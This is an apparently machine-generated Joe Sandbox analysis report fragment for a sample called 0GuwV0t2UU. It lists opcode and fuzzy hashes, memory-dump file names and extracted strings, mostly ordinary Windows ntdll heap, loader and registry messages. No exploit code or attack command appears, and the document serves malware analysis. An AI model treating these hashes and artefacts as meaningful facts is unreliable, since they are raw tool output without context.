                                                        • Opcode Fuzzy Hash: 66f37d6798206b16f0cc421bfac8afb6948eaff9f5c7a55e4ad684a4a247bdbe
                                                        • Instruction Fuzzy Hash: 812201746003129FEB11CF28C450B7ABBFAFF06728F148699E8558B792E775E881CB51
                                                        Strings
                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 378F1728
                                                        • HEAP[%wZ]: , xrefs: 378F1712
                                                        • HEAP: , xrefs: 378F1596
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: d37aa1effe6aaeb11f1e31f373e8af3d7ccd27c9776bb7f80884b043a8f27633
                                                        • Instruction ID: aeb17a7a4406041dd70e6c639f5a6188dae53b3850ed5fab05cc82832fcec9d2
                                                        • Opcode Fuzzy Hash: d37aa1effe6aaeb11f1e31f373e8af3d7ccd27c9776bb7f80884b043a8f27633
                                                        • Instruction Fuzzy Hash: 9DE10074A043469FEB14CF28D491B7ABBF6BF68314F148559E496CB246EB39E840CB50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                        • API String ID: 0-1145731471
                                                        • Opcode ID: 55a2762781e53993b1f82b3e826853475b55d77aa7aa98179dab1655474a2527
                                                        • Instruction ID: 00b1943f7267673ac51112b24764a452526b84a6194c9e9b3981062ff6db7e44
                                                        • Opcode Fuzzy Hash: 55a2762781e53993b1f82b3e826853475b55d77aa7aa98179dab1655474a2527
                                                        • Instruction Fuzzy Hash: D0B1CE75A147199FDB19CF69D880BADB7B6AF583B8F244629E511EB280D731E840CF10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                        • API String ID: 0-2391371766
                                                        • Opcode ID: 1d24e8dfa9e676c1442e4d2e1c8697b7c7dff62cc72c5cae74dde6cb4dcf7e78
                                                        • Instruction ID: 96f36b573f005df0573da3fe97f9d725825527452bffb52c9d6d446db7bee624
                                                        • Opcode Fuzzy Hash: 1d24e8dfa9e676c1442e4d2e1c8697b7c7dff62cc72c5cae74dde6cb4dcf7e78
                                                        • Instruction Fuzzy Hash: FFB1AFB16193C5AFE311CE54C881F5BB7E8BF4D768F410A29F950AB650D778E804CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                        • API String ID: 0-318774311
                                                        • Opcode ID: b53b049a570d5754657b7ef295c77fb4486a91cfb1434d46bfdb63a767f0ac40
                                                        • Instruction ID: 56a20fac3c44fe66d6a32c05a7d798832b5204eb7ec3bbaa068ebf54617e5ab6
                                                        • Opcode Fuzzy Hash: b53b049a570d5754657b7ef295c77fb4486a91cfb1434d46bfdb63a767f0ac40
                                                        • Instruction Fuzzy Hash: F3815BB5609341AFE3118B15C840B6EB7E8FF8D758F400A2DF9989B391DB79E9048B52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                        • API String ID: 0-3870751728
                                                        • Opcode ID: bd408f117c12e810d128544223767b91dd9987bfdb2823b5981bc89f205b6251
                                                        • Instruction ID: e1048ec20117c5ea40d5a700ba68603d911e8ab5f730ae73d1a061482afb10cc
                                                        • Opcode Fuzzy Hash: bd408f117c12e810d128544223767b91dd9987bfdb2823b5981bc89f205b6251
                                                        • Instruction Fuzzy Hash: 5D914BB4E006059FEB14CF68C880BADBBB1BF48318F14C26ED904AB395E7759841CF95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                        • API String ID: 0-373624363
                                                        • Opcode ID: ba90867918500f7b4feb7ace48a42080ca48407202cbb3b5c643d026511e8a21
                                                        • Instruction ID: 53fd26cafdc08555fd44ba7cd1ba85c02ed7d3a752f824a7fa68de667359d80d
                                                        • Opcode Fuzzy Hash: ba90867918500f7b4feb7ace48a42080ca48407202cbb3b5c643d026511e8a21
                                                        • Instruction Fuzzy Hash: 6B91BEB5904319CFEB11CF68E540BAE7BB5FF29368F104295E810AB290D77DAA41CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %$&$@
                                                        • API String ID: 0-1537733988
                                                        • Opcode ID: 38ebb931506ccec160a436eb4ddea15cf9a6d261800a926218d523bfacdf6803
                                                        • Instruction ID: 2ec217126a81999530f3d4ad40e3747871f15b673817f50b2521caebc7270e1d
                                                        • Opcode Fuzzy Hash: 38ebb931506ccec160a436eb4ddea15cf9a6d261800a926218d523bfacdf6803
                                                        • Instruction Fuzzy Hash: 6D71BF746093099FD314EF10C980A1BBBEDBF8527CF108B1DE49967256C734E805DB52
                                                        Strings
                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 379CB82A
                                                        • TargetNtPath, xrefs: 379CB82F
                                                        • GlobalizationUserSettings, xrefs: 379CB834
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                        • API String ID: 0-505981995
                                                        • Opcode ID: 9fec0ca655c05407d3398fec29bd3f71e3dc694ad9c2f2220a87dbfc02826c47
                                                        • Instruction ID: 1f9b75dbf24cb625c957c047b80debdc04c26c3b775447f73f1a38d6ee60d9d5
                                                        • Opcode Fuzzy Hash: 9fec0ca655c05407d3398fec29bd3f71e3dc694ad9c2f2220a87dbfc02826c47
                                                        • Instruction Fuzzy Hash: 2F61927294122EABDF21DF54DC88BD9B7B8EF14758F4102E9E908A7250CB349E84CF91
                                                        Strings
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3794E6C6
                                                        • HEAP[%wZ]: , xrefs: 3794E6A6
                                                        • HEAP: , xrefs: 3794E6B3
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        • Opcode ID: 2e5035070cec8e9408ca3ec884e80f1b2a26f58f373c1ef5b6af830b9755eb64
                                                        • Instruction ID: 6248b8fb9a61b1ab040d71e90f54014620193a28b439c652774618b7205e4230
                                                        • Opcode Fuzzy Hash: 2e5035070cec8e9408ca3ec884e80f1b2a26f58f373c1ef5b6af830b9755eb64
                                                        • Instruction Fuzzy Hash: 4551F675600B94EFE712CB68C844F9ABBFCFF16358F0401A5E5949BA92D778E940CB11
                                                        Strings
                                                        • minkernel\ntdll\ldrmap.c, xrefs: 3795A59A
                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 3795A589
                                                        • LdrpCompleteMapModule, xrefs: 3795A590
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                        • API String ID: 0-1676968949
                                                        • Opcode ID: 346ddf6fe5fa4c456a7ca92bd2579d32870678a71dd16f734a209a4c3a4b12b5
                                                        • Instruction ID: 19cd50795c7b7713b6e685c58f1223b68a83b7a45e0ecc50235c1cb24c1e2476
                                                        • Opcode Fuzzy Hash: 346ddf6fe5fa4c456a7ca92bd2579d32870678a71dd16f734a209a4c3a4b12b5
                                                        • Instruction Fuzzy Hash: 8D5127B4640B49ABE711CB18C984B1A7BE8FF047BCF1403A5F9509B6E2CB75E811CB45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                        • API String ID: 0-1151232445
                                                        • Opcode ID: 98f2052d865622bb098e2fd69c2ca4a39b31ca3a9df2be87657fbd8b2dbdfef4
                                                        • Instruction ID: 40e227ce1e4a787c99161e6f855ab4f54cb6cc23c2f99f10f4313080e87f55d1
                                                        • Opcode Fuzzy Hash: 98f2052d865622bb098e2fd69c2ca4a39b31ca3a9df2be87657fbd8b2dbdfef4
                                                        • Instruction Fuzzy Hash: A44117B42003408FFB14CE5CC5C2B6577D8DF1336CF5445AED8458BAA6DB64E846CB51
                                                        Strings
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 37961B4A
                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37961B39
                                                        • LdrpAllocateTls, xrefs: 37961B40
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-4274184382
                                                        • Opcode ID: 6bff656c9d28312dac6fea9b83ec95e653005647304f6d5cd12a71fee2e61278
                                                        • Instruction ID: f4c15b96ef5273ab310ce98027436109f486968b5371f6dda81743758d11e15d
                                                        • Opcode Fuzzy Hash: 6bff656c9d28312dac6fea9b83ec95e653005647304f6d5cd12a71fee2e61278
                                                        • Instruction Fuzzy Hash: 4141AAB5A40608AFDB11DFA8C840BAEBBF9FF98318F004219E405A7710D779A800CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-964947082
                                                        • Opcode ID: 5e521d99ac4ba936ca7a05a61eb8449f3fbdd0cab1e440186d6d2bc4aeb2862d
                                                        • Instruction ID: d28a54b81fa96d64f2af080e5aaf31f2cc8454561850ced884a0e405248f7824
                                                        • Opcode Fuzzy Hash: 5e521d99ac4ba936ca7a05a61eb8449f3fbdd0cab1e440186d6d2bc4aeb2862d
                                                        • Instruction Fuzzy Hash: F841EFB1616244EFE790CF58D880F6A3BB9EB4832CF408229ED00DB651C738E895CB52
                                                        Strings
                                                        • RtlCreateActivationContext, xrefs: 379629F9
                                                        • SXS: %s() passed the empty activation context data, xrefs: 379629FE
                                                        • Actx , xrefs: 379233AC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                        • API String ID: 0-859632880
                                                        • Opcode ID: 17530b6eedd7911d5cdc4091449101c9422836f973106ad1f88ccb2d6b3d02ed
                                                        • Instruction ID: 77f0669f4545fc36f4a19245e613d93d3b3ab13854119e72a2ad48c0508dc863
                                                        • Opcode Fuzzy Hash: 17530b6eedd7911d5cdc4091449101c9422836f973106ad1f88ccb2d6b3d02ed
                                                        • Instruction Fuzzy Hash: AF3123326113099FEB12DF55DC94F9677A8AB4C738F4546A9EC04DF286CB78E841CB90
                                                        Strings
                                                        • @, xrefs: 3797B670
                                                        • GlobalFlag, xrefs: 3797B68F
                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3797B632
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                        • API String ID: 0-4192008846
                                                        • Opcode ID: c97497981ceee912f25e9823f54ea1cb91352fde9c99f4f6d6eb569a6c8b1429
                                                        • Instruction ID: ddb51700d2d4bb8a92153029c7e8992a6994b867d14bbf1285533eb2c9067456
                                                        • Opcode Fuzzy Hash: c97497981ceee912f25e9823f54ea1cb91352fde9c99f4f6d6eb569a6c8b1429
                                                        • Instruction Fuzzy Hash: 73317AB1E00608AFDB00DF94DC80AEEBBBCEF44358F404569EA04A7241D734AA00CFA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                        • API String ID: 0-1050206962
                                                        • Opcode ID: 99b086c78a41649aa548d05e67e533a29b2015142c28958fb93e05f6c8bc3224
                                                        • Instruction ID: 3d83c1a47a62680f3ed561821e33e9268ac2b151f6465e59c089b3f568440e49
                                                        • Opcode Fuzzy Hash: 99b086c78a41649aa548d05e67e533a29b2015142c28958fb93e05f6c8bc3224
                                                        • Instruction Fuzzy Hash: D5316BB2940219BFEB11CF94CC84EEEBBBDFB49658F410675E900A7211E7389D448BA1
                                                        Strings
                                                        • LdrpInitializeTls, xrefs: 37961A47
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 37961A51
                                                        • DLL "%wZ" has TLS information at %p, xrefs: 37961A40
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-931879808
                                                        • Opcode ID: 895cff6084378fab61f1943d9f271f0ecbbb94bd8e297c45bc1e3c6547e087d4
                                                        • Instruction ID: 9359d2cfff5ff3afa6715ea8dc48e1bdc2c7c0d5c2647b49903c382ca5b4ad3e
                                                        • Opcode Fuzzy Hash: 895cff6084378fab61f1943d9f271f0ecbbb94bd8e297c45bc1e3c6547e087d4
                                                        • Instruction Fuzzy Hash: 0931E171A90708BFF7109B44CC45F6A73ACAB4536CF040329E500B7A94DB68ED9197A5
                                                        Strings
                                                        • BuildLabEx, xrefs: 3793130F
                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3793127B
                                                        • @, xrefs: 379312A5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 0-3051831665
                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                        • Instruction ID: 2a8e298c2be3573672a42ec24ed52ca00a8d4bee31d9f0eae4c33b0f1e37031b
                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                        • Instruction Fuzzy Hash: 1B31CF7290161CAFEB11DF94CC44EAEBBBDEB88768F000225E904A7160DB38DA058B61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: RtlValidateHeap
                                                        • API String ID: 3446177414-1797218451
                                                        • Opcode ID: 3cb7641700a7f98cc053e3cb18e6729a1a483379e65d2b164a9fc25fd4e79bb6
                                                        • Instruction ID: 6b09f3a7d2450e7af0a40b97494f9bf013cc81a0f1ee7df1875605894e6bb22c
                                                        • Opcode Fuzzy Hash: 3cb7641700a7f98cc053e3cb18e6729a1a483379e65d2b164a9fc25fd4e79bb6
                                                        • Instruction Fuzzy Hash: 92413975A00349DFEB01CFA4C4D17AEBBBAFF56228F04835DD421AB691CB389901DB95
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: kLsE
                                                        • API String ID: 3446177414-3058123920
                                                        • Opcode ID: 45c37d58bd1036f2850b09253b5de109012bfe354d74720f5db6356c2f2bca66
                                                        • Instruction ID: fd84b5a6cdf91f47cbcd8da8a62cb99fd08b92f56048a0700dbb663b7e7d7be3
                                                        • Opcode Fuzzy Hash: 45c37d58bd1036f2850b09253b5de109012bfe354d74720f5db6356c2f2bca66
                                                        • Instruction Fuzzy Hash: 7C415B714A934587F721DB64EC42BA93BA8BB4177CF10036DEC506A5E1CB7D5482C792
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@
                                                        • API String ID: 0-149943524
                                                        • Opcode ID: 15413eedc6f582e5cb261d034561e3f3eea24aef5f4d5b8224a28a0281cb40cc
                                                        • Instruction ID: eff0c36ee3af07381a6676eb869657e3370e46239608ce72c19c1d59fc3e1d0f
                                                        • Opcode Fuzzy Hash: 15413eedc6f582e5cb261d034561e3f3eea24aef5f4d5b8224a28a0281cb40cc
                                                        • Instruction Fuzzy Hash: 26329EB85187218BD724CF14C480B7EB7E5EF88B68F504A1EF9859B290E774E984CF52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
